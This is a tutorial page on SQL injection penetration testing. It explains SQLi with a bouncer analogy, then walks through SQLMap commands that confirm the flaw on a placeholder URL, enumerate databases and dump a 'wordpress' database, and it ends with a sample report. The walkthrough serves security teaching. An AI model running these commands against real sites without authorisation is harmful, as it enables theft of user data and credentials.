Skip to content

SQLi Penetration Testing

Introduction to the SQLi

SQL Injection (SQLi) is an attack that allows execution of arbitrary SQL queries on a database through a vulnerable web application. Imagine a nightclub where the bouncer's job is to verify the age of each guest to ensure they're over 21. Instead of checking IDs properly, the bouncer just glances at whatever is shown and lets everyone in, assuming it's valid. This lack of scrutiny allows individuals who are underage and/or have fake IDs to enter the club, potentially causing trouble.

In the case of SQL injection, the web application (bouncer) is supposed to validate and sanitize user inputs (IDs) to ensure only safe and legitimate queries (guests) interact with the database (club). However, if the application fails to properly check and sanitize these inputs, malicious actors (underage individuals) can inject harmful SQL code (fake IDs) into the query, gaining unauthorized access to sensitive data (entering the club) and potentially causing damage.

laxBouncer-chacho

This walkthrough demonstrates using SQLMap to exploit a vulnerable URL parameter on a MySQL-based website. Steps include confirming the vulnerability, enumerating databases, and extracting data from the "wordpress" database. The scenario highlights the impact of SQLi vulnerabilities, such as unauthorized data access, and concludes with preparing a pentest report to document findings and recommendations.

SQLMap: SQLi Scenario

Step 1: Identify the Target

Assess the security of a website, http://example.com. The target URL is http://example.com/products.php?id=1.

Step 2: Initial Reconnaissance

Use basic browser testing and tools like Burp Suite to determine if the id parameter in the URL might be vulnerable to SQL injection.

Step 3: Running SQLMap for SQL Injection

Use SQLMap to test and exploit the SQL injection vulnerability.

sqlmap -u "http://example.com/products.php?id=1" --dbms=mysql --batch --banner
Command Explanation
  • -u "http://example.com/products.php?id=1": Specifies the URL with the potential SQL injection point.
  • --dbms=mysql: Forces the backend database type to MySQL.
  • --batch: Runs in non-interactive mode, using default options.
  • --banner: Retrieves the database server's banner to confirm the database type and version.
Step 4: Database Enumeration

After confirming the vulnerability and the database type, enumerate the databases.

sqlmap -u "http://example.com/products.php?id=1" --dbms=mysql --batch --dbs
Command Explanation
  • --dbs: Lists all databases on the MySQL server.
Step 5: Dumping Tables from a Specific Database

Target the "wordpress" database to list tables and dump data.

sqlmap -u "http://example.com/products.php?id=1" --dbms=mysql -D wordpress --tables
Command Explanation
  • -D wordpress: Specifies the "wordpress" database.
  • --tables: Lists all tables within the "wordpress" database.
sqlmap -u "http://example.com/products.php?id=1" --dbms=mysql -D wordpress --dump
Command Explanation
  • --dump: Dumps all entries from the tables in the "wordpress" database.
Step 6: Reporting Findings

The pentester documents the findings, including:

  • The vulnerable URL and parameter.
  • The database server type and version.
  • The list of databases and tables.
  • Sample data extracted from the database.

Example Report
Vulnerable URL: http://example.com/products.php?id=1

Database Server: MySQL 5.7.29

Databases Found:

  • information_schema
  • mysql
  • performance_schema
  • wordpress

Tables in 'wordpress' Database:

  • wp_users
  • wp_posts
  • wp_comments

Sample Data from 'wp_users' Table: 

| ID | user_login | user_pass           | user_email          |
|----|------------|---------------------|---------------------|
| 1  | admin      | $P$B1234567890abcdef| admin@example.com   |